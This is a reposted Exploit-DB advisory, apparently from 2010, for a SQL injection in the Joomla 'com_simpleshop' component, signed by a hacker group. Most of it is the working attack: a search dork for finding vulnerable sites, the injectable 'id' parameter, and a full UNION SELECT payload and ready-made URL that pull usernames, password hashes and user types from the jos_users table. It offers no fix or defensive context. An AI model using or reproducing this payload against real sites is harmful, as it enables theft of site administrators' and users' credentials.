Joomla! Component com_SimpleShop – SQL Injection - 体验盒子

作者： UnD3rGr0unD W4rri0rZ

日期： 2010-07-29

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14501/

==============================================================
Joomla Component (com_simpleshop) SQL Injection Vulnerability
==============================================================

###########################
Title : Joomla Component (com_simpleshop) SQL Injection Vulnerability
Script : Joomla Galore Simple Shop
Date : 07/26/2010
Author : UnD3rGr0unD W4rri0rZ
Vendor : http://galore.co.za/ 
Dork : inurl:"option=com_simpleshop" & inurl:"viewprod"
########################### 
 
[ Vulnerable File ]
 
[path]/index.php?option=com_simpleshop&Itemid=xx&task=viewprod&id=[SQL]

[SQL]:

id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--

Xpl
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--

############################################################## 
#==================================================
#{~} I am HeaDShoT(tunisian muslim hacker) From UnD3rGr0unD W4rri0rZ{~}
#
#cont@ct:
#pwz@hotmail.Fr
#
#{~} there is always one who intelligent more than you do you should be optimistic{~}
#==================================================
#all greetZ to allah
#&
# my friends
# M4MIM4N // L363ND //Meher Assel // Ghost_tn //ta3lab el maker // Th3 m3t4l-m4n
#
##############################################################